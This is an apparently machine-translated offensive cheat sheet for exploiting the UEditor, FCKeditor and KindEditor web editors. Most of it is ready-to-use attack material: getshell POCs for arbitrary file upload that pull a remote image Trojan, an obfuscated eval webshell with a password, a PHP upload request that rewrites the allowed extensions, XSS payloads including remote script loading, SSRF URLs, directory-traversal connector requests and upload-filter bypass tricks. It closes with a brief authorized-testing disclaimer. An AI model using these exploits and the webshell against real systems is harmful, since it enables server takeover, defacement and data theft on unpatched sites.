Ueditor Editor vulnerability

File upload vulnerability

1. NET Version file upload
   The arbitrary file upload vulnerability exists in 1.4.3.3、1.5.0 and 1.3.6 In the version , And only .NET Version affected by this vulnerability . Hackers can use this vulnerability to upload Trojan files , Execute the command to control the server .
   The vulnerability is due to when uploading files , The use of CrawlerHandler Class does not validate the file type , Caused arbitrary file upload .1.4.3.3 and 1.5.0 The version is used in a slightly different way ,1.4.3.3 Need a domain name that can be resolved correctly . and 1.5.0 use IP And common domain names . relatively speaking 1.5.0 Version is easier to trigger this vulnerability ; And in the 1.4.3.3 In the version, the attacker needs to provide a normal domain name address to bypass the judgment ;
   (1) ueditor .1.5.0.net edition
   First 1.5.0 Version tested , You need to upload a picture Trojan horse on the Internet server first , such as :1.jpg/1.gif/1.png Fine , below x.x.x.x Is the address of the Internet server ,source[] The parameter value is changed to the address of the image Trojan , And add... At the end “?.aspx” that will do getshell, utilize POC：

POST /ueditor/net/controller.ashx?action=catchimage
source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

(2) ueditor.1.4.3.3 .net edition
1. Locally construct a html, Because it's not an upload vulnerability, so enctype It is not necessary to specify multipart/form-data, I've seen... Before poc This value is specified . complete poc as follows ：

<form action="http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">  <p>shell addr: <input type="text" name="source[]" /></p >  <input type="submit" value="Submit" /></form>

2. Need to prepare a picture horse , long-range shell The address needs to be specified with an extension of 1.gif?.aspx,1.gif Picture Trojan horse （ In a word, Trojans ： password ：hello） as follows ：

GIF89a<script runat="server" language="JScript"> function popup(str) {
       var q = "u"; var w = "afe"; var a = q + "ns" + w; var b= eval(str,a); return(b); }</script><% popup(popup(System.Text.Encoding.GetEncoding(65001). GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJoZWxsbyJd")))); %>

(3) ueditor.1.3.6 .net1 edition
Use %00 Upload by truncation

(4) PHP Version of the file upload
utilize poc：

POST http://localhost/ueditor/php/action_upload.php?action=uploadimage&amp;CONFIG[imagePathFormat]=ueditor/php/upload/fuck&amp;CONFIG[imageMaxSize]=9999999&amp;CONFIG[imageAllowFiles][]=.php&amp;CONFIG[imageFieldName]=fuck HTTP/1.1Host: localhostConnection: keep-aliveContent-Length: 222Cache-Control: max-age=0Origin: nullUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/60.0.3112.78 Safari/537.36Content-Type: multipart/form-data; boundary=——WebKitFormBoundaryDMmqvK6b3ncX4xxAAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4———WebKitFormBoundaryDMmqvK6b3ncX4xxAContent-Disposition: form-data; name="fuck"; filename="fuck.php"Content-Type: application/octet-stream<?php phpinfo();?>———WebKitFormBoundaryDMmqvK6b3ncX4xxA—
shell Path by CONFIG[imagePathFormat]=ueditor/php/upload/fuck decision http://localhost/ueditor/php/upload/fuck.php

XSS Loophole

Popup

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
alert(1);
</something:script>
</body>
</html>

URL Jump

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>

Remote load Js

<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>

If you can't find the upload xml You can use the following payload

POST /edit/php/controller.php?action=uploadfile HTTP/1.1
Host: www.baidu.com
Cookie: PHPSESSID=5eoic6stihj2j5oeaila86v7vk;
Content-Length: 351
Cache-Control: max-age=0
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.baidu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKDwVp6zo1JCNDZ55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


------WebKitFormBoundaryKDwVp6zo1JCNDZ55
Content-Disposition: form-data; name="upfile"; filename="test.xml"
Content-Type: image/jpeg

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(/ Just a vulnerability test /);
</something:script>
</body>
</html>
------WebKitFormBoundaryKDwVp6zo1JCNDZ55--

config.json You can view the uploaded interface name and the suffix supported by the interface

/ueditor/asp/config.json

/ueditor/net/config.json

/ueditor/php/config.json

/ueditor/jsp/config.json

config.json You can see the interface path that can list the uploaded files 
/ueditor/net/controller.ashx?action=listfile
/ueditor/net/controller.ashx?action=listimage

Upload file path

/ueditor/index.html

/ueditor/asp/controller.asp?action=uploadimage

/ueditor/asp/controller.asp?action=uploadfile

/ueditor/net/controller.ashx?action=uploadimage

/ueditor/net/controller.ashx?action=uploadfile

/ueditor/php/controller.php?action=uploadfile

/ueditor/php/controller.php?action=uploadimage

/ueditor/jsp/controller.jsp?action=uploadfile

/ueditor/jsp/controller.jsp?action=uploadimage

SSRF Loophole

/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg

/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif

/ueditor/php/controller.php?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif

FCKeditor Editor vulnerability

see FCKeditor edition

http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html

Test upload point

FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

List

FCKeditor/editor/fckeditor.html

FCKeditor/editor/fckeditor.html You can't upload files , You can click the upload image button and select browse server to jump to the upload file page , You can view the uploaded files .

according to xml Return to the information to view the website directory

http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

Get the current folder

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

Browse the drive letter file

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

Pop website absolute path

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

modify CurrentFolder Parameters use …/…/ To enter different directories

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

JSP edition ：

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

Breakthrough limit

• Upload restrictions
  There are many ways to break through upload restrictions , The main thing is to change the extension by capturing packets ,%00 truncation , Add file header, etc
• File name restrictions
  The second upload bypasses the file name ‘ . ’ It is amended as follows ‘ _ ’
  FCK Uploaded such as shell.asp;.jpg After the document , The file name will be automatically changed to shell_asp;.jpg. You can continue to upload files with the same name , The file name will change to shell.asp;(1).jpg
  Submit shell.php+ Space around
  Spaces only support windows System ,linux The system does not support , Can be submitted shell.php+ Space to bypass the file name limit .
  IIS6.0 Break through folder restrictions

Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

File parsing restrictions
adopt Fckeditor The editor is on the file upload page , Create such as 1.asp Folder , Then upload a picture under this folder webshell file , Get its shell.
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg

FCKeditor v2.4.3

FCKeditor v2.4.3 in File By default, the category refuses to upload ：
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm 
 But the saved files are directly used $sFilePath = $sServerDir . $sFileName, Instead of using $sExtension For the suffix ,
 Directly resulting in win Add a... After the uploaded file . To break through , You can also use 2003 Parsing vulnerability establishment xxx.asp Folder or upload xx.asp;.jpg!

Fckeditor 2.0 <= 2.2

Fckeditor 2.0 <= 2.2 Allow upload asa、cer、php2、php4、inc、pwml、pht Postfix file , It can also be in win Add a... After the uploaded file . To break through , stay apache Next ,"Apache File name resolution flaw " You can also use , Like upload cer file 

.htaccess The way

 There is no limit to some .htaccess The file is successfully uploaded to the server .htaccess The code in the file allows  .jpg The file name in the suffix file format is php Format parsing ,
 Upload first .htaccess file , Then upload the picture horse .

Kindeditor Editor vulnerability

Upload address

kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file

View version information

http://127.0.0.1/kindeditor/kindeditor.js

The basic scripting language customizes different upload addresses , It is necessary to verify the file before uploading upload_json.* The existence of

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

Can be uploaded

Upload poc

<html><head>

<title>Uploader By ICE</title>

<script src="http://[Target]/kindeditor/kindeditor-min.js"></script>

<script> KindEditor.ready(function(K) {
       var uploadbutton = K.uploadbutton({
       button : K('#uploadButton')[0], fieldName : 'imgFile', url : 'http://[Target]/kindeditor/php/upload_json.asp?dir=file', afterUpload : function(data) {
       if (data.error === 0) {
       var url = K.formatUrl(data.url, 'absolute'); K('#url').val(url);} }, }); uploadbutton.fileBox.change(function(e) {
       uploadbutton.submit(); }); }); </script></head><body>

<div class="upload">

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

<input type="button" id="uploadButton" value="Upload" />

</div>

</body>

</html>

disclaimer ：

Only for authorized security testing , It is forbidden to attack the site without authorization . This article is only for study and research . It is strictly forbidden to use the content of this article to illegally operate other Internet applications , If it is used for illegal purposes , The consequences will be borne by you , All risks arising are not related to the author of this article , If you continue to read this article, you will follow this content by default .